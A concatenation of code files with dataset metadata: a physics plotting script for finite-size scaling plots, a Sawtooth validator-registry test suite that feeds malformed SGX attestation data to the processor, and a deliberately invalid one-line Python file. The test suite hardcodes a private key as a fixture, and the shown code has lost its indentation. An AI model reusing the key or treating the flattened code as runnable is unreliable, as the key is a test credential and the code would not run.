if "L" in runs:
L_list = runs["L"]
elif "size" in runs:
L_list = runs["size"]
T_list = runs["T"]
datadict = {}
print(data.shape)
for i,L in enumerate(L_list):
try:
n,m = L
if n == 0:
key = (m,"$L={}$".format(int(m)))
else:
key = (np.sqrt(n**2+m**2),r"$L=\sqrt{{{}}}$".format(n**2+m**2))
mask = T_list > 0
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,0,0,i]))
yscale=-1.0
except TypeError:
if L < 10: continue
key = (L,"$L={}$".format(int(L)))
mask = T_list < 2*L
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,i,mask,0,0]))
# d = np.hstack((np.atleast_2d(1/T_list).T,data[i,mask,0]))
# d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,-1,0,:]))
yscale=0.0
datadict[key] = d
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^2$",
ylabel="$Q(v,L)$",xscale=2,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_SU2_1d_scale_2.pdf"),bbox_inches="tight")
plt.clf()
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
xscale = 1.0
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL$",
ylabel="$Q(v,L)$",xscale=xscale,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
xmin,xmax = ax2.get_xlim()
ymin,ymax = ax2.get_ylim()
# x = np.linspace(xmin,xmax,1000)
# ax2.plot(x,x**(-1),label="linear")
# ax2.set_ylim(ymin,ymax)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_SU2_1d_scale_1.pdf"),bbox_inches="tight")
def spin_bath_2d_1():
datafile = "data/2d_spin_bath_1.npz"
runs = np.load(datafile)
keys = sorted(runs.keys())
print(keys)
data = runs["data"]
if "L" in runs:
L_list = runs["L"]
elif "size" in runs:
L_list = runs["size"]
T_list = runs["T"]
datadict = {}
print(data.shape)
for i,L in enumerate(L_list):
try:
n,m = L
if n == 0:
key = (m,"$L={}$".format(int(m)))
else:
key = (np.sqrt(n**2+m**2),r"$L=\sqrt{{{}}}$".format(n**2+m**2))
mask = T_list < 10*np.sqrt(n**2+m**2)
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,0,0,i]))
yscale=-1.0
except TypeError:
if L < 10: continue
key = (L,"$L={}$".format(int(L)))
mask = T_list > 0
d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,i,mask,0,0]))
# d = np.hstack((np.atleast_2d(1/T_list).T,data[i,mask,0]))
# d = np.hstack((np.atleast_2d(1.0/T_list[mask]).T,data[i,mask,-1,0,:]))
yscale=0.0
datadict[key] = d
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^2$",
ylabel="$Q(v,L)$",xscale=2,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_SU2_2d_scale_2.pdf"),bbox_inches="tight")
plt.clf()
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
xscale = 1.0
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL$",
ylabel="$Q(v,L)$",xscale=xscale,yscale=yscale)
plot(ax1,datadict,1,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["yscale"] = 0.0
options["logy"] = True
plot(ax2,datadict,2,**options)
xmin,xmax = ax2.get_xlim()
ymin,ymax = ax2.get_ylim()
# x = np.linspace(xmin,xmax,1000)
# ax2.plot(x,x**(-1),label="linear")
# ax2.set_ylim(ymin,ymax)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_SU2_2d_scale_1.pdf"),bbox_inches="tight")
def tfim_1d_snake():
datafile = "data/snake_2.npz"
runs = np.load(datafile)
keys = sorted(runs.keys())
print(keys)
data = runs["data"]
if "L" in runs:
L_list = runs["L"]
elif "size" in runs:
L_list = runs["size"]
T_list = runs["T"]
datadict = {}
print(data.shape)
for i,L in enumerate(L_list):
key = (L,"$L={}$".format(int(L)))
d = np.hstack((np.atleast_2d(1.0/T_list).T,data[0,i,0,:]))
yscale=0.0
datadict[key] = d
# Two subplots, the axes array is 1-d
width = 3.39
height = 1.5*width
f, (ax1,ax2) = plt.subplots(2,figsize=(width,height))
options = dict(logy=False,logx=True,xlabel="$vL^2$",
ylabel="$Q(v,L)$",xscale=2)
plot(ax1,datadict,1,ecol=2,legend=True,legend_opts=dict(ncol=1,fontsize=6),**options)
options["ylabel"] = "$m^2(v,L)$"
options["logy"] = True
plot(ax2,datadict,3,ecol=4,**options)
f.text(0.025,0.95,"$(a)$",fontsize=12)
f.text(0.025,0.465,"$(b)$",fontsize=12)
plt.tight_layout()
f.savefig(os.path.join(".","model_snake_scale_2.pdf"),bbox_inches="tight")
plt.clf()
spin_bath_2d_1()
spin_bath_1d_5()
spin_bath_1d_2()
tfim_1d_snake()
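The xscale/yscale arguments in plot() implement a finite-size-scaling collapse: x and y are rescaled by powers of L so that curves for different system sizes fall on top of each other when the exponents are right. A minimal sketch of the idea on synthetic data (the scaling function f and the exponent 2 are illustrative, not taken from the models above):

import numpy as np
import matplotlib.pyplot as plt

f = lambda u: 1.0 / (1.0 + u)           # illustrative scaling function
v = np.logspace(-4, 0, 50)               # sweep of "velocities"
for L in [8, 16, 32]:
    y = f(v * L**2)                      # synthetic observable obeying y = f(v*L^2)
    plt.loglog(v * L**2, y, label="$L={}$".format(L))  # rescaled x collapses all L
plt.xlabel("$vL^2$")
plt.ylabel("$Q(v,L)$")
plt.legend()
plt.show()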
[row stats: avg_line_length 22.765766 · max_line_length 106 · alphanum_fraction 0.639098 · size_file_byte 10,108 · num_lines 444 · remaining qsc_* quality-signal values elided]
hexsha: 0c569a0531019dbcb6916074d2eafce32a2c24ea | size: 33,558 | ext: py | lang: Python | path: consensus/poet/families/tests/test_tp_validator_registry.py | repo: trust-tech/sawtooth-core | head: fcd66ff2f13dba51d7642049e0c0306dbee3b07d | licenses: ["Apache-2.0"] | stars: 1 (2017-08-04T10:31:00.000Z) | issues: null | forks: null
# Copyright 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------------------
import json
import base64
import hashlib
from sawtooth_processor_test.transaction_processor_test_case \
import TransactionProcessorTestCase
from validator_reg_message_factory import ValidatorRegistryMessageFactory
from sawtooth_poet_common import sgx_structs
from sawtooth_poet_common.protobuf.validator_registry_pb2 import \
ValidatorRegistryPayload
PRIVATE = '5HsjpyQzpeoGAAvNeG5PzQsn1Ght18GgSmDaEUCd1c1HpA2avzc'
PUBLIC = '02f3d385777ab35888fc47af6d123bba6f8b04817a4746e97446ce1562fc4307d7'
class TestValidatorRegistry(TransactionProcessorTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.factory = ValidatorRegistryMessageFactory(
private=PRIVATE,
public=PUBLIC)
def _expect_invalid_transaction(self):
self.validator.expect(
self.factory.create_tp_response("INVALID_TRANSACTION"))
def _expect_ok(self):
self.validator.expect(self.factory.create_tp_response("OK"))
def test_valid_signup_info(self):
"""
Testing valid validator_registry transaction. This includes sending new
signup info for a validator that has already been registered.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with the simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with the simulator valid enclave basenames
self.validator.respond(
self.factory.create_get_response_simulator_enclave_basenames(),
received)
# Expect Request for the ValidatorMap
received = self.validator.expect(
self.factory.create_get_request_validator_map())
# Respond with an empty ValidatorMap
self.validator.respond(
self.factory.create_get_empty_response_validator_map(), received)
# Expect a request to set the new validator in the ValidatorMap
received = self.validator.expect(
self.factory.create_set_request_validator_map())
# Respond with the ValidatorMap address
self.validator.respond(
self.factory.create_set_response_validator_map(),
received)
# Expect a request to set ValidatorInfo for val_1
received = self.validator.expect(
self.factory.create_set_request_validator_info("val_1",
"registered"))
# Respond with address for val_1
# val_1 address is derived from the validator's id
# val id is the same as the pubkey for the factory
self.validator.respond(
self.factory.create_set_response_validator_info(),
received)
self._expect_ok()
# --------------------------
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with the simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with the simulator valid enclave basenames
self.validator.respond(
self.factory.create_get_response_simulator_enclave_basenames(),
received)
# Expect Request for the ValidatorMap
received = self.validator.expect(
self.factory.create_get_request_validator_map())
# Respond with a validator Map
self.validator.respond(
self.factory.create_get_response_validator_map(),
received)
# Expect to receive a validator_info request
received = self.validator.expect(
self.factory.create_get_request_validator_info())
# Respond with the ValidatorInfo
self.validator.respond(
self.factory.create_get_response_validator_info(
"val_1"), received)
# Expect a request to set ValidatorInfo for val_1
received = self.validator.expect(
self.factory.create_set_request_validator_info(
"val_1", "revoked"))
# Respond with address for val_1
# val_1 address is derived from the validator's id
# val id is the same as the pubkey for the factory
self.validator.respond(
self.factory.create_set_response_validator_info(), received)
# Expect a request to set ValidatorInfo for val_1
received = self.validator.expect(
self.factory.create_set_request_validator_info("val_1",
"registered"))
# Respond with address for val_1
# val_1 address is derived from the validator's id
# val id is the same as the pubkey for the factory
self.validator.respond(
self.factory.create_set_response_validator_info(),
received)
self._expect_ok()
def test_invalid_name(self):
"""
Test that a transaction with an invalid name returns an invalid
transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
# The name is longer than 64 characters
payload = ValidatorRegistryPayload(
verb="reg",
name="val_11111111111111111111111111111111111111111111111111111111"
"11111",
id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
self._expect_invalid_transaction()
def test_invalid_id(self):
"""
Test that a transaction with an id that does not match the
signer_pubkey returns an invalid transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
# The id should match the signer_pubkey in the transaction_header
payload = ValidatorRegistryPayload(
verb="reg",
name="val_1",
id="bad",
signup_info=signup_info
)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
self._expect_invalid_transaction()
def test_invalid_poet_pubkey(self):
"""
Test that a transaction without a poet_public_key returns an invalid
transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
signup_info.poet_public_key = "bad"
payload = ValidatorRegistryPayload(
verb="reg",
name="val_1",
id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with the simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with the simulator valid enclave basenames
self.validator.respond(
self.factory.create_get_response_simulator_enclave_basenames(),
received)
self._expect_invalid_transaction()
def _test_bad_signup_info(self, signup_info, expect_config=True):
payload = ValidatorRegistryPayload(
verb="reg",
name="val_1",
id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
if expect_config:
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with the simulator valid enclave measurements
self.validator.respond(
self.factory.
create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with the simulator valid enclave basenames
self.validator.respond(
self.factory.create_get_response_simulator_enclave_basenames(),
received)
self._expect_invalid_transaction()
def test_invalid_verification_report(self):
"""
Test that a transaction whose verification report is invalid returns
an invalid transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
# Verification report is missing (proof_data is an empty dict)
proof_data = signup_info.proof_data
signup_info.proof_data = json.dumps({})
self._test_bad_signup_info(signup_info, expect_config=False)
# ------------------------------------------------------
# No verification signature
proof_data_dict = json.loads(proof_data)
del proof_data_dict["signature"]
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info, expect_config=False)
# ------------------------------------------------------
# Bad verification signature
proof_data_dict["signature"] = "bads"
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# No EPID pseudonym
proof_data_dict = json.loads(proof_data)
verification_report = \
json.loads(proof_data_dict["verification_report"])
del verification_report["epidPseudonym"]
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Altered EPID pseudonym (does not match anti_sybil_id)
proof_data_dict = json.loads(proof_data)
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report["epidPseudonym"] = "altered"
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Nonce does not match the one in signup_info
proof_data_dict = json.loads(proof_data)
verification_report = \
json.loads(proof_data_dict["verification_report"])
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
signup_info.nonce = 'a non-matching nonce'
self._test_bad_signup_info(signup_info)
def test_invalid_pse_manifest(self):
"""
Test that a transaction whose pse_manifest is invalid returns an
invalid transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
proof_data = signup_info.proof_data
proof_data_dict = json.loads(proof_data)
# ------------------------------------------------------
# no pseManifestStatus
verification_report = \
json.loads(proof_data_dict["verification_report"])
del verification_report['pseManifestStatus']
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Bad pseManifestStatus
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report['pseManifestStatus'] = "bad"
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# No pseManifestHash
verification_report = \
json.loads(proof_data_dict["verification_report"])
del verification_report['pseManifestHash']
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Bad pseManifestHash
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report['pseManifestHash'] = "Bad"
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Missing evidence payload
evidence_payload = proof_data_dict["evidence_payload"]
del proof_data_dict["evidence_payload"]
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Missing PSE manifest
del evidence_payload["pse_manifest"]
proof_data_dict["evidence_payload"] = evidence_payload
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Bad PSE manifest
evidence_payload["pse_manifest"] = "bad"
signup_info.proof_data = json.dumps(proof_data_dict)
self._test_bad_signup_info(signup_info)
def test_invalid_enclave_body(self):
"""
Test that a transaction whose enclave_body is invalid returns an
invalid transaction.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
proof_data = signup_info.proof_data
proof_data_dict = json.loads(proof_data)
# ------------------------------------------------------
# No isvEnclaveQuoteStatus
verification_report = \
json.loads(proof_data_dict["verification_report"])
enclave_status = verification_report["isvEnclaveQuoteStatus"]
verification_report["isvEnclaveQuoteStatus"] = None
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Bad isvEnclaveQuoteStatus
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report["isvEnclaveQuoteStatus"] = "Bad"
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# No isvEnclaveQuoteBody
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report["isvEnclaveQuoteStatus"] = enclave_status
verification_report['isvEnclaveQuoteBody'] = None
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Malformed isvEnclaveQuoteBody (decode the enclave quote, chop off
# the last byte, and re-encode)
verification_report = \
json.loads(proof_data_dict["verification_report"])
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode())[1:])\
.decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Invalid basename
verification_report = \
json.loads(proof_data_dict["verification_report"])
sgx_quote = sgx_structs.SgxQuote()
sgx_quote.parse_from_bytes(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode()))
sgx_quote.basename.name = \
b'\xCC' * sgx_structs.SgxBasename.STRUCT_SIZE
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(sgx_quote.serialize_to_bytes()).decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Report data is not valid (bad OPK hash)
verification_report = \
json.loads(proof_data_dict["verification_report"])
sgx_quote = sgx_structs.SgxQuote()
sgx_quote.parse_from_bytes(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode()))
hash_input = \
'{0}{1}'.format(
'Not a valid OPK Hash',
self.factory.poet_public_key).upper().encode()
sgx_quote.report_body.report_data.d = \
hashlib.sha256(hash_input).digest()
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(sgx_quote.serialize_to_bytes()).decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Report data is not valid (bad PPK)
verification_report = \
json.loads(proof_data_dict["verification_report"])
sgx_quote = sgx_structs.SgxQuote()
sgx_quote.parse_from_bytes(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode()))
hash_input = \
'{0}{1}'.format(
self.factory.pubkey_hash,
"Not a valid PPK").encode()
sgx_quote.report_body.report_data.d = \
hashlib.sha256(hash_input).digest()
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(sgx_quote.serialize_to_bytes()).decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
# ------------------------------------------------------
# Invalid enclave measurement
verification_report = \
json.loads(proof_data_dict["verification_report"])
sgx_quote = sgx_structs.SgxQuote()
sgx_quote.parse_from_bytes(
base64.b64decode(
verification_report['isvEnclaveQuoteBody'].encode()))
sgx_quote.report_body.mr_enclave.m = \
b'\xCC' * sgx_structs.SgxMeasurement.STRUCT_SIZE
verification_report['isvEnclaveQuoteBody'] = \
base64.b64encode(sgx_quote.serialize_to_bytes()).decode()
signup_info.proof_data = \
self.factory.create_proof_data(
verification_report=verification_report,
evidence_payload=proof_data_dict.get('evidence_payload'))
self._test_bad_signup_info(signup_info)
def test_missing_report_key_pem(self):
"""
Testing validator registry unable to retrieve the report public key
PEM from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with empty report key PEM
self.validator.respond(
self.factory.create_get_response_report_key_pem(),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_invalid_report_key_pem(self):
"""
Testing validator registry unable to successfully parse the report
public key PEM from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with empty report key PEM
self.validator.respond(
self.factory.create_get_response_report_key_pem(pem='invalid'),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_missing_enclave_measurements(self):
"""
Testing validator registry unable to retrieve the valid enclave
measurements from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with the simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with empty valid enclave measurements
self.validator.respond(
self.factory.create_get_response_enclave_measurements(),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_invalid_enclave_measurements(self):
"""
Testing validator registry unable to successfully parse the valid
enclave measurements from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with the simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with invalid enclave measurements
self.validator.respond(
self.factory.create_get_response_enclave_measurements(
measurements='invalid'),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_missing_enclave_basenames(self):
"""
Testing validator registry unable to retrieve the valid enclave
basenames from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with the simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with empty enclave basenames
self.validator.respond(
self.factory.create_get_response_enclave_basenames(),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
def test_invalid_enclave_basenames(self):
"""
Testing validator registry unable to successfully parse the valid
enclave basenames from the config setting.
"""
signup_info = self.factory.create_signup_info(
self.factory.pubkey_hash, "000")
payload = ValidatorRegistryPayload(
verb="reg", name="val_1", id=self.factory.public_key,
signup_info=signup_info)
# Send validator registry payload
self.validator.send(
self.factory.create_tp_process_request(payload.id, payload))
# Expect Request for the address for report key PEM
received = self.validator.expect(
self.factory.create_get_request_report_key_pem())
# Respond with the simulator report key PEM
self.validator.respond(
self.factory.create_get_response_simulator_report_key_pem(),
received)
# Expect Request for the address for valid enclave measurements
received = self.validator.expect(
self.factory.create_get_request_enclave_measurements())
# Respond with simulator valid enclave measurements
self.validator.respond(
self.factory.create_get_response_simulator_enclave_measurements(),
received)
# Expect Request for the address for valid enclave basenames
received = self.validator.expect(
self.factory.create_get_request_enclave_basenames())
# Respond with invalid enclave basenames
self.validator.respond(
self.factory.create_get_response_enclave_basenames(
basenames='invalid'),
received)
# Expect that the transaction will be rejected
self._expect_invalid_transaction()
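All of the tests above drive the transaction processor through the same scripted expect/respond conversation. A stripped-down sketch of that pattern; MockValidator and the message strings are hypothetical stand-ins, not the real sawtooth_processor_test API:

class MockValidator:
    """Scripted conversation partner for a transaction processor under test."""
    def __init__(self):
        self.inbox = []
    def send(self, msg):
        self.inbox.append(msg)        # processor -> validator
    def expect(self, expected):
        msg = self.inbox.pop(0)       # assert the processor asked what we expect
        assert msg == expected, msg
        return msg
    def respond(self, response, received):
        self.inbox.append(response)   # validator -> processor

v = MockValidator()
v.send("get: report_key_pem")
received = v.expect("get: report_key_pem")
v.respond("pem: <simulator key>", received)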
[row stats: avg_line_length 37.748031 · max_line_length 80 · alphanum_fraction 0.632696 · size_file_byte 33,558 · num_lines 888 · remaining qsc_* quality-signal values elided]
hexsha: a7551d7e4e686681f6b2c1bf5241243c3eba8acd | size: 12 | ext: py | lang: Python | path: examples/Tests/Action/Python/file_parse_error.py | repo: esayui/mworks | head: 0522e5afc1e30fdbf1e67cedd196ee50f7924499 | licenses: ["MIT"] | stars/issues/forks: null
y = 1 - * 2
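Given its path (examples/Tests/Action/Python/file_parse_error.py), this one-liner is a deliberately malformed asset, so the syntax error is the point and should not be "fixed". A quick illustration of how the failure surfaces, separate from the mworks harness:

# Confirm the asset fails to parse, as its filename promises.
source = "y = 1 - * 2"
try:
    compile(source, "file_parse_error.py", "exec")
except SyntaxError as err:
    print("parse error:", err.msg)  # e.g. "invalid syntax"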
[row stats: avg_line_length 6 · max_line_length 11 · alphanum_fraction 0.25 · size_file_byte 12 · num_lines 1 · remaining qsc_* quality-signal values elided]
